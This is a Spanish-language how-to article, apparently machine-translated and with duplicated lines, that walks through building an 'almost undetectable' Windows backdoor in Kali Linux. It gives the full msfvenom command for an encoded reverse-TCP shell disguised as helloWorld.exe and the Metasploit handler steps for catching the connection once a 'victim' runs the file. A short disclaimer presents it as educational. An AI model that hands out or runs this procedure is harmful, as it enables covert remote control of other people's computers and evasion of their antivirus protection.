Cómo crear una puerta trasera casi indetectable usando MSFvenom en Kali Linux.

Cómo crear una puerta trasera casi indetectable usando MSFvenom en Kali Linux

Se utiliza una puerta trasera para eludir los mecanismos de seguridad, a menudo de forma secreta y, en su mayoría, indetectable. Usando MSFvenom, la combinación de msfpayload y msfencode, es posible crear una puerta trasera que se conecta nuevamente con el atacante mediante el uso de TCP de shell inverso. Para desarrollar una puerta trasera, debe cambiar la firma de su malware para evadir cualquier software antivirus. Complete este proyecto en un par de computadoras a las que tenga permiso de acceso y, en el proceso, aprenderá más sobre la seguridad informática y cómo funciona este tipo de puerta trasera.

Pasos

  1. Paso 1. Inicie Kali y encienda la consola Terminal.
    Imágenes de Google Paso 1 Inicie Kali y encienda la consola Terminal.
    Inicie Kali y encienda la consola Terminal.
  2. Paso 2 Escriba ifconfig para mostrar la interfaz y verificar su dirección IP.
    Imágenes de Google Paso 2 Escriba ifconfig para mostrar la interfaz y verifique su dirección IP.
    Escriba ifconfig para mostrar la interfaz y verificar su dirección IP.
  3. Paso 3 Escriba msfvenom -l codificadores para mostrar la lista de codificadores.
    Imágenes de Google Paso 3 Escriba msfvenom -l codificadores para mostrar la lista de codificadores.
    Escriba msfvenom -l codificadores para mostrar la lista de codificadores.
    • Utilizará x86/shikata_ga_nai como codificador.
  4. Cómo crear una puerta trasera casi indetectable usando MSFvenom en Kali Linux
    Google imágenes Cómo crear una puerta trasera casi indetectable usando MSFvenom en Kali Linux
    Escriba "msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT=4444 -b "x00" -e x86/shikata_ga_nai -f exe > helloWorld.exe
    • -a x86 --platform windows designa la arquitectura a utilizar.
    • -p windows/shell/reverse_tcp designa las cargas útiles para incrustar.
    • LHOST designa la dirección IP del oyente.
    • LPORT designa el puerto de escucha.
    • -b "x00" designa evitar caracteres incorrectos (bytes nulos).
    • -e x86/shikata_ga_nai designa el nombre del codificador.
    • -f exe > helloWorld.exe designa el formato de salida.
  5. Paso 5. Escriba msfconsole para activar Metasploit.
    Imágenes de Google Paso 5 Escribe msfconsole para activar Metasploit.
    Escriba msfconsole para activar Metasploit.
    • Ahora ha generado su puerta trasera. Cuando la víctima hace clic en helloWorld.exe, la carga útil del shell que está integrada se activará y establecerá una conexión con su sistema. Para recibir la conexión, debes abrir el controlador múltiple en Metasploit y configurar las cargas útiles.
  6. Paso 6 Escriba use exploit/multi/handler.
    Imágenes de Google Paso 6 Escribe use exploit/multi/handler.
    Escriba use exploit/multi/handler.
  7. Paso 7 Escriba set payload windows/shell/reverse_tcp.
    Imágenes de Google Paso 7 Escriba set payload windows/shell/reverse_tcp.
    Escriba set payload windows/shell/reverse_tcp.
  8. Paso 8 Escriba mostrar opciones para verificar el módulo.
    Imágenes de Google Paso 8 Escriba mostrar opciones para verificar el módulo.
    Escriba mostrar opciones para verificar el módulo.
  9. Paso 9 Escriba set LHOST 192.168.48.129.
    Imágenes de Google Paso 9 Escriba set LHOST 192.168.48.129.
    Escriba el conjunto LHOST 192.168.48.129.
    • "LHOST" designa la dirección IP del oyente.
  10. Paso 10 Escriba set LPORT 4444.
    Imágenes de Google Paso 10 Escriba set LPORT 4444.
    Escriba el conjunto LPORT 4444.
    • "LPORT" designa el puerto de escucha.
  11. Paso 11 Escriba ejecutar y espere la conexión desde la máquina de la víctima.
    Imágenes de Google Paso 11 Escriba ejecutar y espere la conexión desde la máquina de la víctima.
    Escriba ejecutar y espere la conexión desde la máquina de la víctima.
  12. Paso 12 Espere a que la víctima haga clic en helloWorld.exe.
    Imágenes de Google Paso 12 Espere a que la víctima haga clic en helloWorld.exe.
    Espere a que la víctima haga clic en helloWorld.exe. Luego se conectará exitosamente a la máquina de la víctima.

Advertencias

  • Este artículo tiene únicamente fines educativos. Hackear sin autorización o permiso no es ético y, a menudo, es ilegal. Gracias Útil 0 No útil 0

Cosas que necesitarás

  • KaliLinux
  • ventanas
  • Máquina virtual
    • VirtualBox
    • VMware